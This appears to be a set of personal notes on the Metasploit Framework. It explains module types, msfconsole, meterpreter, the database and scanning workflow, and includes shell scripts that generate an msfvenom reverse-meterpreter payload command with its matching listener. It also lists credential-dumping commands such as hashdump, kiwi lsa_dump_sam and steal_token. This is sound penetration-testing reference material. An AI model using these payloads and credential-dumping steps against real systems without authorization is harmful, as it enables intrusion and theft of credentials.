Metasploit framework

The Metasploit Framework is an open-source penetration testing framework: a library of exploit, scanner and post-exploitation modules plus the tooling (msfconsole, msfvenom, a database) needed to run them against a target.

Modules are written in Ruby 💎, and the framework ships with a large library of ready-made ones, so most of the time you configure an existing module rather than write your own.

Learn 🎓

Modules are divided into types 📌

  • Auxiliary: scanners, fuzzers, brute-forcers and admin tools; they don't deliver a payload (port scanning, banner grabbing, hash dumps, ...)
  • Payloads: the code that runs on the target once an exploit succeeds (a command shell, a meterpreter, ...)
    • Single/inline/stageless payloads: the whole payload is sent at once (1 exchange), e.g. windows/x64/meterpreter_reverse_tcp
    • Staged payloads: a small stager runs first and fetches the rest from the handler (2 exchanges), e.g. windows/x64/meterpreter/reverse_tcp (note the / instead of the _)
    • See msfvenom for details and payload creation.
  • Exploits: code exploiting a vulnerability to deliver a payload
  • Encoders (re-encode a payload, e.g. to avoid bad characters; not an antivirus bypass) / Evasion (payload packaging meant to get past antivirus) / NOPs (padding)
  • Post: modules run on an already compromised target through an existing session (loot collection, privilege escalation, pivoting, ...)
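Added example, not from these notes: a small shell script that turns the staged/stageless naming convention above into a check, builds the msfvenom command for a payload, and writes the multi/handler resource script that matches it. The list of stage names it recognises, and the LHOST, LPORT and file names, are assumptions made for the example.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes. Tells staged from stageless
# payloads by Metasploit's naming convention, builds the msfvenom command for
# one, and prints the matching multi/handler resource script.
#   staged    <platform>/[arch/]<stage>/<stager>   e.g. windows/x64/meterpreter/reverse_tcp
#   stageless <platform>/[arch/]<stage>_<stager>   e.g. windows/x64/meterpreter_reverse_tcp
# The stage names checked and the LHOST/LPORT/file names are assumptions.

# Print "staged" or "stageless" for a payload path.
payload_kind() {
  local last="${1##*/}" dir="${1%/*}"
  case "$last" in
    # stage fused to the stager with '_': everything ships in one blob
    meterpreter_*|shell_*|vncinject_*|dllinject_*|powershell_*) echo stageless ;;
    *)
      case "$dir" in
        # last component is only the stager; the stage sits just before it
        */meterpreter|*/shell|*/vncinject|*/dllinject|*/powershell) echo staged ;;
        # singles such as cmd/unix/reverse_bash or windows/exec
        *) echo stageless ;;
      esac ;;
  esac
}

# msfvenom command line for the payload (exe for Windows, elf for Linux,
# raw otherwise; adjust -f for other targets).
venom_cmd() {
  local payload="$1" lhost="$2" lport="$3" out="$4" fmt
  case "$payload" in
    windows/*) fmt=exe ;;
    linux/*)   fmt=elf ;;
    *)         fmt=raw ;;
  esac
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' \
    "$payload" "$lhost" "$lport" "$fmt" "$out"
}

# Listener as a resource script. PAYLOAD must be exactly the msfvenom -p value:
# a staged handler waits to push a stage that a stageless binary never asks for,
# so the handshake never completes and no session opens (and vice versa).
handler_rc() {
  local payload="$1" lhost="$2" lport="$3"
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Demo with placeholder values (no Metasploit needed to run this far).
for p in windows/x64/meterpreter/reverse_tcp windows/x64/meterpreter_reverse_tcp; do
  printf '%-40s %s\n' "$p" "$(payload_kind "$p")"
done
venom_cmd windows/x64/meterpreter/reverse_tcp 10.0.0.5 4444 shell.exe
handler_rc windows/x64/meterpreter/reverse_tcp 10.0.0.5 4444
```

Save the handler_rc output to a file and start it with msfconsole -q -r handler.rc before the generated binary runs on the target; ExitOnSession false keeps the listener up after the first session, which matters when several hosts call back.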



msfconsole is the interactive console of the framework: you use it to search for and configure modules, run them, and manage the sessions they spawn (a plain command shell or, preferably, a meterpreter).

$ msfconsole -q
msf6> help
msf6> help <command>
msf6> help help # example

history shows every command you typed in the console.

Each connection to a compromised target is wrapped in a session: sessions -l lists them, sessions -i <id> attaches to one, and background (in a meterpreter) or Ctrl-Z returns you to the console while the session stays open.

You can also set options and run a module in one go. check (only for modules that implement it) tests whether the target looks vulnerable without firing the exploit:

exploit> run opt=value opt2=value [...]
exploit> check opt=value opt2=value [...]


Meterpreter is Metasploit's own payload. Rather than a plain shell, it is an in-memory agent that talks to the handler over an encrypted channel and loads extensions (stdapi, priv, kiwi, ...) whose commands make privilege escalation and post-exploitation easier: file transfer, hashdump, migrate, getsystem, port forwarding, and so on.

If an exploit only gave you a plain shell, upgrade it (sessions -u runs post/multi/manage/shell_to_meterpreter; note the session id when you background it, and -1 means the most recent session):

# upgrade the most recent session (-1) to a meterpreter; this opens a new session
msf6 exploit(module_used) > sessions -u -1
# kill the plain shell session that is no longer needed
msf6 exploit(module_used) > sessions -k old_session_id
# interact with the new meterpreter session
msf6 exploit(module_used) > sessions -i new_session_id
# done

The commands available in a meterpreter depend on the payload you used (platform and loaded extensions): a native Windows x64 meterpreter offers more than a PHP or Python one.

Call help to see what you can use with the current payload.

meterpreter > help # list commands that you can use

Common commands 🪴

Uncommon usages

Metasploit database

$ sudo systemctl start postgresql
$ sudo msfdb init
$ msfconsole -q
msf6> db_status
[*] Connected to msf. Connection type: postgresql.

You can export results using: db_export -f xml db.xml.


To keep things clean and tidy, create one workspace per engagement, so that results from different targets don't get mixed up.

msf6> workspace # list workspaces
msf6> workspace -a xxx # create xxx
msf6> workspace xxx # move to xxx
msf6> workspace -d xxx # delete xxx

port scanner

db_nmap takes the same arguments as nmap but stores the hosts and services it finds in the database (the database must be set up first). A scan run outside the console can be imported from nmap's XML output (-oX).

msf6> db_nmap -sV -p- -A IP
msf6> db_import nmap_result.xml # or, load a scan result
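Added example, not part of the original notes: the database workflow above (workspace, db_nmap, then a banner grab of every web service the scan found, then export) as a resource script generated and run from the shell, so a scan can be repeated without retyping it in msfconsole. It assumes the database is already initialised with msfdb init; the workspace name, target range and port list are placeholders.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes. Builds a msfconsole resource
# script (one console command per line, executed in order by `msfconsole -r`) for:
#   workspace -> db_nmap -> http_version on every web port found -> db_export
# Assumes `msfdb init` was already run. Names and ports below are placeholders.

# Print the resource script for one engagement.
scan_rc() {
  local workspace="$1" target="$2" export_file="$3"
  # -R on `services` sets RHOSTS from the filtered database entries, so the
  # banner grab only touches hosts that actually exposed one of those ports.
  cat <<EOF
workspace -a $workspace
workspace $workspace
db_nmap -sV --open -p- $target
hosts
services
services -p 80,443,8080,8443 -R
use auxiliary/scanner/http/http_version
run
db_export -f xml $export_file
exit
EOF
}

# Number of console commands the script will execute (a sanity check before
# launching a long scan).
scan_rc_lines() {
  scan_rc "$@" | wc -l | tr -d ' '
}

# Write the script to a temp file and run the console on it headless.
run_scan() {
  local rc
  rc="$(mktemp)"
  scan_rc "$@" > "$rc"
  msfconsole -q -r "$rc"
  rm -f "$rc"
}

# Show the generated script for a placeholder engagement (no console needed).
scan_rc demo-engagement 10.0.0.0/24 demo-engagement.xml
```

run_scan demo-engagement 10.0.0.0/24 demo-engagement.xml launches the whole thing; if the scan finds no service on the listed ports, RHOSTS stays unset and the http_version run reports an error, but the remaining commands (export, exit) still execute.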

banner grabbing

msf6> use auxiliary/scanner/http/http_version # HTTP

SQL utility

All of these need valid database credentials (USERNAME/PASSWORD options).

msf6> use auxiliary/scanner/mysql/mysql_schemadump # dump tables and columns
msf6> use auxiliary/scanner/mysql/mysql_hashdump # dump users and password hashes
msf6> use auxiliary/admin/mysql/mysql_sql # run SQL queries
msf6> use auxiliary/scanner/postgres/postgres_schemadump # ...
msf6> use auxiliary/admin/postgres/postgres_sql # ...


msfconsole can be used along with Nessus through the nessus plugin. See this tutorial and these tips. Note that the Metasploit database must be started first.

msf6> load nessus
msf6> nessus_help # list commands
msf6> # Connect
msf6> nessus_connect user:pass@localhost:8834
msf6> # List the scans that you did
msf6> nessus_scan_list
msf6> # Import the result of a scan
msf6> nessus_db_import id_you_found_in_the_list

Useful commands

Once something is stored in the database (nmap, Nessus, ...), these commands query and filter the saved data (each one takes -h for its filters, and -R to set RHOSTS from the result):

msf6> help hosts
msf6> help services
msf6> help vulns
msf6> help creds
msf6> help loot

👻 To-do 👻

Stuff that I found, but never read/used yet.

  • Commands:
    • Jobs are cancellable processes (kill): run -j, jobs, jobs -i 0
    • exploit -k -z
  • get xxx
  • spool
  • run autoroute -h (autoroute module)
    • socks
    • proxychains
    • set PROXIES HTTP:
  • show advanced options, advanced
  • search type:exploit platform:windows target:xp smb
  • exploit/windows/smb/ms08_067_netapi
  • multi/ssh/sshexec

You can prefix any command with grep to filter its output, and chain filters too: grep x grep y <command>.

  • Meterpreter: steal_token <pid>
  • Hashdump not working on some Windows: load kiwi then lsa_dump_sam does the job. See also: lsa_dump_secrets.
  • Plugins: /usr/share/metasploit-framework/plugins
  • use /path/to/xxx.rb (tested: relative to exploit)